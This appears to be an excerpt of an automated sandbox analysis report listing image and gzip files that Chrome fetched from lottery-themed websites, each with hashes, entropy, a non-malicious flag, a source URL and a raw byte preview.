                                                                                                                                                          SSDEEP:1536:ByHy3I3ss9/Bddf8WOrs/ATZyhw2MZSvUguVzGOL4TqPimfvKi:wjcm/BdZ8+rw2MZSvUgaGOLRpXKi
                                                                                                                                                          MD5:17F2C02267AF3C4F71354A0EF7E81B2B
                                                                                                                                                          SHA1:C103DAD9FB317968FD03F9CD1B70B2674FED6AA3
                                                                                                                                                          SHA-256:C0E00678D0CB10604E89A7B7547484808D2EA251F5376A0A81780F5A046ED597
                                                                                                                                                          SHA-512:B4EAE1889100ADCAC39809D7FFEFFCA8897E95502E00905675E1C61B7673EEF45692B021E3FC0692BC821659A20DF5A5E6513CE840D5EF975902B86284237025
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/lottery/01.png
                                                                                                                                                          Preview:.PNG........IHDR.....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......IDATx...g.-Iv..~{GD.c.7..2.|uU{..0$A@..-....Y.3.."5..@..G.g.K...D..6E. .h......]..}..{..{|.0{~.{_.....=G.V.sN..<y#....DD.?b...{..8...................t..o...-.<=a.s F..X...wD....[..._}.._..z...ny%|.........{...;.]..k..A..?F;..w..w........z.;........../P.{].;............F.....;$X...l.)..>.[%`.w.B..w.wKm...!_..k..a.;...sp..]..........%p...5...........*A.-...O....hz...d.Z?8'...n.......;.{C...L..;x...o....D.....>...K.......].om..O../.[...niq...x.{7..."...s..c..X.........\a...^...;...%....G......Ia..0.5..e)...W.0.0..Y-....w.........S.... ..EWG....e5mC.....I...f4.&./...;....H..n=......{.....^..W.....'..x../....}N..#.<B...........[...T....@.>....!..?K.<OX....... ... .I..`......d5Pk...../7....2a.@..a.J?.oE..'....q..g...f.....X.1d2..|h1......u6....1..E!w.>'...3.i.Qz..2....).Z..P+a..a).<..........|..~...."..._.}.{{...9.....p...m.u.m.`..^..*...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1020 x 70
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):46296
                                                                                                                                                          Entropy (8bit):7.90992422001696
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:nJydCwuBhwTijhSuE4BOo3diVigzWC3W6flfeLr5qTK4LiW+fn7MO5d9QjdpR:JB9BhTzJddg13flWrUK42Pf7MO5d9Ql
                                                                                                                                                          MD5:6599D33C37F7CF6E6C8FF5FC23E64C31
                                                                                                                                                          SHA1:E8D01C518F33DE4948081FB34D6905331286C3B6
                                                                                                                                                          SHA-256:034455F2E109B44E3BDC554D8101E168F3CCAC1B9CBCD100A1E5E5285241921D
                                                                                                                                                          SHA-512:EA25D5202231A1CD4801E146B6479DD95CA9FFE4B0545709F45DC5970881078F38200BED9877C9AA286E8E7CD63F4F3CC2B817BE4B7B8898BC7CF05E3DD0AB76
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/1fca8c8f6e46d22afdc2c135ec9cac1d.gif
                                                                                                                                                          Preview:GIF89a..F....8IH.................{........kz....Sq.w..erq'5:......s.......................',.......................kf.......................$%...................j.................OXc......................emw......j........c..2;F............r..s.|......Z........`..x..........CUQ@JU.VQ.-4.........Wil.......@A...............v..........o....&..............ms...................1A;......^gr...Zbm...KT_....~l..?a....R_Z...o.........5W._hb.......R`\.............................m..................G]^......l..............\b......^gbs..............Fj.......FOZ........................U^hf................ov...............V|....u.........../O..........H^_Gj..............................................................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 34 x 58, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5239
                                                                                                                                                          Entropy (8bit):7.956474960653488
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:JH+isy3p+fP6nuBGiQYJsB8MhZvAc3FZ+UME5uQQfhoojxc4xA6nKrKqzQK2kdsu:W8+fP6uLQeDMhGc1Z+UrMjxHxA6nKrYw
                                                                                                                                                          MD5:C62FE8B35D8F6F5618C969C3C8C0BFE0
                                                                                                                                                          SHA1:0474A2C8E04CE557EE3BD71F88DFFF0AF1B0958D
                                                                                                                                                          SHA-256:C6FC76EC8B7447F653DD08A0818BC5831E16B41DEBE84369F2E901044035F51B
                                                                                                                                                          SHA-512:917E281AE4E6A48B4B05CDD27D4EED039B700DBD3AEEDB03C86D17D164C5F4593FA5039E944E41FE03257A8EC0E768E1D44CC38C072E0BFFF16D8CF7C7835D0C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR..."...:.......4...>IDAThC.w\Tg..w.T..{.Q..k.D..b.bGQW..5F.5n.S...&..d...F..K".X.E...(...0...!.}7m.l>...f..}...<......|._...VGNXfX.GL..dp..vSf..[+IV.......q....?...a.<... ..9/?.V.7._@bC..X.5[..L_.}.......d.<...[Wo......Y..d.}B&..x.FQ.`....>...9?...2&..c.......mr....oC..,..O*F6.n..D...}}.m.[[Go<T..p_...Ow.K?`V.<L.........{..Z-W1.QGp........._..M...H.v..s.."......:..c......g8....`?....M....4(n...".BY...........o.'..p./.Y..@f.......W...[...f0...:...O.....F..o{.6.?.g.t...9M..X.t..k...#A....i........%o.N.}kQ......H......Z..mt.QN_..M@P ..^O......P1.n....;.W_x+i.[j6...si..g.....h.g..R....34I..g..G.."Nf_..........?..zb..S..V;.ox..DI...b..c1qWU;o.{.o{...n|..;.RUZ....j}.e..O........l.....y..[2+'.L.x..m..X.t......O...5./M.Xa...G....u..s.u.}}....<.u.{!4.e.s.qo..^p.q..L..0P.}%Q..%(D.X.....^.%..VL.V.p.t."..yfR..O..yc.;.;._...;..].|p......dOz.fR.......^.8.......6...y....!.D..C?.Nu.r.[3..K...6..%.J+.+..1cY..1.<.-|s....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 51040
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6923
                                                                                                                                                          Entropy (8bit):7.966497753792618
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:gGzWJD0UqUdMjERb7WA4oosvijz7tpdNoyjlMR7i+:gIWJ5qUrOAfVqjPtnSgMhz
                                                                                                                                                          MD5:657C75ACB32EC5C4BBE754E74CEE87F1
                                                                                                                                                          SHA1:EAC1C97F5890172E01EF96F7072A61E16FB092B0
                                                                                                                                                          SHA-256:EC2DBC190D02E033780990A716E52AD3672EF244BF71CE89923157309B744934
                                                                                                                                                          SHA-512:E2928D994B69961B7AC13E78EBF8B54ED947A7127BEDBD7128784C880662A83DE5C1343E76D45B1BBEE883E526711C9FD81B10A8066991C7D38E3C55BC770300
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/ftl/commonPage/themes/gui-layer.css
                                                                                                                                                          Preview:...........]{.#.q._.b...;.7....%d$.|..+.")~. .d..-9C..ooE...).l9..."..99.q...9.WQ.|.56.`.....~.3{{.Ow......uu...N....y........9^.&........?80..t:.c.{........]...#g|8...71......../2~.].. r.h`........V.d.z...2..-.x....t.......G..4.`...3q..a.7...;...d.2.5D.o.U#...<rQ]0...l.!...J.G.-3.;...U.2PM..,+.....i...{...X.V...a.`..............7.....]-R. ....X.;...F...3....l..3H.8U.H..*.:X\i]w.........,....O...Z+ov....@.....iB.......A.7\.nE..pg.AZ....I.`c.M_[.....p".&.....7..`/....Sg.............\...z.N..K........ r..<........;...F..g......x...<...O.>.H|..7p..}|n|..K.W;;.Bx..1p..J-.........!r.|..wh...hG.I..v......X....y.F.b...*;..........`6r.X..O.}U........u.........g..6.{.....e.F.@[F..cE..em..l.Z...z..SuK.}-.$.x..d3/.s.1...s......t.......a5r.5..S...M.j.*I...<.S.(N.c....8q..V.r.v..D0G=h.....B..Wh.0...8r*=.!'.0.$...((.Z)'..EE.,...D....KV#4Z.Bn.(..T)7....M....D..s.MS#.d@...d.6F)4jP..MYrI.I4.F-..Ft.8.i...gW1...T.T#Mb-.JSUpia.$..v.x ..........?q.B..`0....YG>.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 46 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5461
                                                                                                                                                          Entropy (8bit):7.889006070723789
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:S2Lcv5P/QlLZ5eGVcwIYrhS88Jh6LjwuFKaP+XsWFFCSGjXiotM2Ye:Ll9xcwI+klz6XFKehWFFCNB
                                                                                                                                                          MD5:4DFB8214DB94FDA6E86C3A0BCAD8086F
                                                                                                                                                          SHA1:4A729DC54343B1DA813CC1B5834941BF2BAD91A9
                                                                                                                                                          SHA-256:9C51D38AF9670B8C9C74A9A60D266219E052AF09557A4A13343F2E2B586016A2
                                                                                                                                                          SHA-512:EECEF5F07DD6B33B38E3C6A67521D155FBE33C0A51023AA511731F147208C77D1D3D578B415D0EE6A8A0499CD7BBBFA6AC4F6FA9CE9673D2B38AEB118888CA22
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.......(........*....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:B156FB5A7B7911E8A09EAE377C0425CB" xmpMM:DocumentID="xmp.did:B156FB5B7B7911E8A09EAE377C0425CB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B156FB587B7911E8A09EAE377C0425CB" stRef:documentID="xmp.did:B156FB597B7911E8A09EAE377C0425CB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..B....IDATx.Yi.].Y~..s.e...Y=3vf<.c.!q........R.@!..G.....).../...T...T..%)..BR.l..5v.x.=^f..w?...}....M#N...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4975
                                                                                                                                                          Entropy (8bit):7.857704680690562
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:dF5IhQA1MnPQ9GBWdKqeiVKHMJkP1U2UbBJuET5b1VDkH9Fv:G1YSVcpUbjT5BRkdFv
                                                                                                                                                          MD5:692908678ABE41B359A556B5EACBEAB0
                                                                                                                                                          SHA1:4004F1ECEA6DDB603E4E706C89F4426A8C10ADD6
                                                                                                                                                          SHA-256:E74332A3C8A6E0E9839AA1350A2093A2EE850F1D9F1844D58DEDC6B13A986A4A
                                                                                                                                                          SHA-512:396567182016501BE6F0F10F0C31290574E9DCCE55021FC7117408EE74F87BA46EF7E0491703EC752F4A637898A9CD9D851EA27E5F36B61DC6B8ECC456F5F0F0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/card_tp.png
                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:64E8B6CB89F011EAAA3187E8B31DCDC2" xmpMM:InstanceID="xmp.iid:64E8B6CA89F011EAAA3187E8B31DCDC2" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:44a76a31-a741-df47-be85-17dd3e48eedf" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>^......IDATx..[{.\W}..}.s........I
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 18388
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4084
                                                                                                                                                          Entropy (8bit):7.94569233466241
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:mwcWOzIzqP0Drv6oQckG8NF/xiWqpvCkxpR:RwIzXscRqRxiWkTpR
                                                                                                                                                          MD5:106BA6DD5A7918BDB0DD73A4594C5684
                                                                                                                                                          SHA1:5DA4B04A3D47B087CDC723C63606CCD53D61C52F
                                                                                                                                                          SHA-256:4BE1B19DD11804094ACA2A4C9E62C22AFD21B14EAFFCA0874E87A3441BE04966
                                                                                                                                                          SHA-512:1B1589144CCB52B8F53C0D6862E626808F70748B3F4E3DCB950F985A8C2200E7CE7FAD056AC6645FAD84063178DC517FAAAC7ADC2EF18BA20D19666C8CA3833E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/ocs/zbw?r=1183512601
                                                                                                                                                          Preview:...........WKo.6.>o~E.^c.....E.=t...........E.....z.R..zk` ...7.of......J..=..*E.r].=t..(..R..o.b.m.%.N.....&=|8.C/.I ....N.....P......_.o....7._P..N...=........=......$..*..jc...^..........._.>....f..s...u).}".H......t}:].YO^+.C..K?=....p.CD=._......%.{.Y'Y(.4..'..K...aV..]!6....Y!.*.e.EY.K./(.-h.t.._.\.f....C..=..K.~rV6......i..h.x~.{2U.G.....T..n..j.~.^:........s..U`N]}j1.T%....)7.u.6G..y8.....@.H..zz|...y"...DZTJ.}.'d.I......eQ.~..X*..Q.>.NO...avi......gA.V.O.\...O...."K<..%........,....w.V&...gA.k..L.K....!3....y..Y.WG...d;l0...go_.HxU.......b.|..(.f^.JE....=w<..i...q~%.<..G}.r..3..U.e)..;...DX.-.r.g.3....aKB.I..Xhy.R.b......W.......K....:p......y8.a...%`..n..E`e..JyA..R`lwK...........,....u=.l..>f. .~....._....z...7.Nwow..s..S..s....,..m....{+<h.....v/.'.%a...dd....Z.Pq..0.`~Cg.wx:.".-@0.I>..a.S.A.PLL.s.....309......)..:......s.X.D....w#h.[m.m.y....0.% .Iv.a+..D.. ..N....S../.BM..........gd..2.s.5..v..lg.c.;.....v..`...;.1_..C...2..0
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):43162
                                                                                                                                                          Entropy (8bit):7.953145877023125
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:WTC0nclGUxk45YhUb+TdhiKQc8XfCvHplUR5GZlCKP4CUoKNUaK:Wm0nclJ64cUSTaK38PCvJAoVwC2G
                                                                                                                                                          MD5:369B22647FABC5FFC0211854F258589C
                                                                                                                                                          SHA1:4450C1135E15EDE8AB1361AA187B186F594C5A8F
                                                                                                                                                          SHA-256:6A0549CF5AFB7D4092E4034C163305C38D97DA27777D9710E4E7477DF6BEAB0C
                                                                                                                                                          SHA-512:69D58556A422B3944F14D04A21D6E32B5FC8EC34A55ABBF0F4D39646F711EBD4402E3450E517E958F7E00CA35BEF4E00534B7A5106D8BBDE059ACD11EA0F7E6F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/061410/rcenter/common/images/errors/ico-605.png
                                                                                                                                                          Preview:.PNG........IHDR.............\r.f...aIDATx^...%U.7......'.&..a.C.A2..T.%...]..5...~.u..[.]]uE...L(.HP...!....{........<.9...f.....Su.nMw...1....<...#...==T..x.......3.^K...v...8......(...j..z\.z.$..s.^..;u.......q..W..x.RG.x...7.|......1J....=.1S......y...y>n.....$..Bi.2.%"..N.V:...:...x.S...+..V...R{....... t.]..H.z...9l.y......O?....w.1.:...?YA.J.SU./.c.=.x.n.&L. ....Y|.(s.e..j......T*....0.|..{.se`SE.f.B....|..w..................K/....0.....w.;T.wIoo.K....={r.`.h.f...b...8....g.7+.c2.0.0.......d2`.`&.C))..b.2...s....|.~.^e...g...w.c.<.G..t@.:..E.'N<[.?..........A8...5...**.P....`..f..........3I..QF.P..P........G?Z......(3.^:...x&.~...*....DA....7O2..z.@O.K.L.`.d.4....dppP...e..`.X.u~.L.k.q.........v{.....6...'O>1...,5...{@2i.$...:Tgy...88w..c........-.......oP&....mw..2:..3.=KA....9...Kl.Cm.2e.L.6....]..g%.....0....!l..$.m.uj...}.....D._/....eW.......W.....7+.......O.:......p~n....Hf...~.-[..........N|f.2.o...k^.61...:.?..Aj..A..2
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 34 x 58, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5239
                                                                                                                                                          Entropy (8bit):7.956474960653488
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:JH+isy3p+fP6nuBGiQYJsB8MhZvAc3FZ+UME5uQQfhoojxc4xA6nKrKqzQK2kdsu:W8+fP6uLQeDMhGc1Z+UrMjxHxA6nKrYw
                                                                                                                                                          MD5:C62FE8B35D8F6F5618C969C3C8C0BFE0
                                                                                                                                                          SHA1:0474A2C8E04CE557EE3BD71F88DFFF0AF1B0958D
                                                                                                                                                          SHA-256:C6FC76EC8B7447F653DD08A0818BC5831E16B41DEBE84369F2E901044035F51B
                                                                                                                                                          SHA-512:917E281AE4E6A48B4B05CDD27D4EED039B700DBD3AEEDB03C86D17D164C5F4593FA5039E944E41FE03257A8EC0E768E1D44CC38C072E0BFFF16D8CF7C7835D0C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/parner/logo_monaco.png
                                                                                                                                                          Preview:.PNG........IHDR..."...:.......4...>IDAThC.w\Tg..w.T..{.Q..k.D..b.bGQW..5F.5n.S...&..d...F..K".X.E...(...0...!.}7m.l>...f..}...<......|._...VGNXfX.GL..dp..vSf..[+IV.......q....?...a.<... ..9/?.V.7._@bC..X.5[..L_.}.......d.<...[Wo......Y..d.}B&..x.FQ.`....>...9?...2&..c.......mr....oC..,..O*F6.n..D...}}.m.[[Go<T..p_...Ow.K?`V.<L.........{..Z-W1.QGp........._..M...H.v..s.."......:..c......g8....`?....M....4(n...".BY...........o.'..p./.Y..@f.......W...[...f0...:...O.....F..o{.6.?.g.t...9M..X.t..k...#A....i........%o.N.}kQ......H......Z..mt.QN_..M@P ..^O......P1.n....;.W_x+i.[j6...si..g.....h.g..R....34I..g..G.."Nf_..........?..zb..S..V;.ox..DI...b..c1qWU;o.{.o{...n|..;.RUZ....j}.e..O........l.....y..[2+'.L.x..m..X.t......O...5./M.Xa...G....u..s.u.}}....<.u.{!4.e.s.qo..^p.q..L..0P.}%Q..%(D.X.....^.%..VL.V.p.t."..yfR..O..yc.;.;._...;..].|p......dOz.fR.......^.8.......6...y....!.D..C?.Nu.r.[3..K...6..%.J+.+..1cY..1.<.-|s....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 68 x 79, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):8202
                                                                                                                                                          Entropy (8bit):7.943926398746772
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:QdAJE521VSL4i+TGRgH6rZxyPsVuL8oxmM9AtJ2HdyxMQk1+Ay:ev5Ws4lGaH6NgCjmmM9AtFMQk0Ay
                                                                                                                                                          MD5:54F3E573C7AF59DF24542128AEEB6984
                                                                                                                                                          SHA1:8C9F023E395926BBDB6F5A0AEF83ACD8FA14155E
                                                                                                                                                          SHA-256:3D561FC6FACA37123D78035388B4B3C6543716686901C85496AB490EC2A5350B
                                                                                                                                                          SHA-512:419FB5A6E3179767F5DDA9441031A4FF5BC72B974A694856BB6B2422D1FC3D527D5E4BCA81958326C4AA7614C9BC2FC5F72CA7189DCD852611885FF45F61998F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/service/convenient_icon.png
                                                                                                                                                          Preview:.PNG........IHDR...D...O.....R.cq....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.............!IDATx..|y.\U....g....2..A........."..2......"8...{}.8...<@. .yPF....U@e..L.......3....TUw......oS..T...[k...}.........r..`..i..#.Z..)8.....<EM.. ..Q...-=.L!1J.P.i.(CY^.wR.#%R...*................#...P........@<..........a...1.(....+...q.N..3o.-Z...Vf.V..\e.v....`.9....)..m.'......`.. ..&#V.Y.<.H~g../..e.]...... ..9`..tt.L.t.....B..g..A.D.\......'6.6<:...Y.m.s...+4..B...V..`Y. ....U..$...*...P.-..b+k.....".j.K.9.#..$........8.F..;.tGe ,.S7...N.j.. .r.e......,.b..C...4*M..b@X.!7..6.d].0<....3*..pd..4M..@.....?W...SGV.~......y....[:o..u. ....*>w..E.Ly...Lg.N.R..l.......L.t...M....c...@y........D..3.]a....S7.V.w[..M.{FI.}(...".#.....<....... .e.~.v.....(.1!.....}O.x.p.E....^......%..6k?.m...c.ZH]!M...p9.....@-...<..@P...pM..|....z.>..8Ppp......>....6o.:.....D....3..i#$D:WQ/N..6.l1{.*.9I.[)g.Y}...)...W.z.J.j.........W......,..0@....kq...H.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 180 x 45, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3968
                                                                                                                                                          Entropy (8bit):7.8318716321861
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:blg2STKHJkX5t/ycPi3Yh/6eEu69hNjVe8pHTAs2AKS:b5pkX5IbM6jVe0HTRJ
                                                                                                                                                          MD5:5D7A0A2EA8FC1B8ABC5A525F59A3B3D8
                                                                                                                                                          SHA1:632F7A9CF38606D35C3076E3DC61AB9ACD6F3B4D
                                                                                                                                                          SHA-256:D3F18938D4C9C9195C566386E4B0E3AF3B63FEE043E5BCCD445EFC84B61B5D6F
                                                                                                                                                          SHA-512:D730554A27C02DA4964581E2B9D4FDB635B5650904CF08DF2C33537F0F22393E7579FC087C010375AF2554DB516600115909D786AB1613F4E53F3C8A84ADE798
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.......-.............tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:1F497DFDF3A111E7BA819AFA36D3A361" xmpMM:DocumentID="xmp.did:1F497DFEF3A111E7BA819AFA36D3A361"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1F497DFBF3A111E7BA819AFA36D3A361" stRef:documentID="xmp.did:1F497DFCF3A111E7BA819AFA36D3A361"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>d.e.....IDATx..\.p......_.rI.....A+\......P...S..$..8P%.Q.(&....!...'..vZ..:...&.P@......$H"..\.....l..6..K.%...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):25956
                                                                                                                                                          Entropy (8bit):7.970174820456842
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:sx/d21srklvj4IRBmCa//Jt4dhIODq1S9I6W3gf:AOB3a/Rt4dhIsRI6W3gf
                                                                                                                                                          MD5:2BCE0C91243A8C6AF9F2734C62046E91
                                                                                                                                                          SHA1:C54D733AF6149D9B9C125909BE19D7E08E23EB00
                                                                                                                                                          SHA-256:C2C44236B6B88D17AAF3385171CE1A7BBAD8CF9AAC5428E4995F13EDBA258E1D
                                                                                                                                                          SHA-512:8363D759CD2B681E3532B00551DAE280C0A8F3091357E73B02F2005B37EF845FFD091FEBA14FD76AED841B4BD25CEC3ACEB1831090C0CB0FD0A4596765EEC631
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/video/gc_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:E61647D6616311E7A4EABB69A1A4E81E" xmpMM:InstanceID="xmp.iid:E61647D5616311E7A4EABB69A1A4E81E" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7337d2d7-b8b5-bf4f-bdae-fe34287673e4" stRef:documentID="adobe:docid:photoshop:1ae07fbb-6062-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):151324
                                                                                                                                                          Entropy (8bit):5.961896786964676
                                                                                                                                                          Encrypted:false
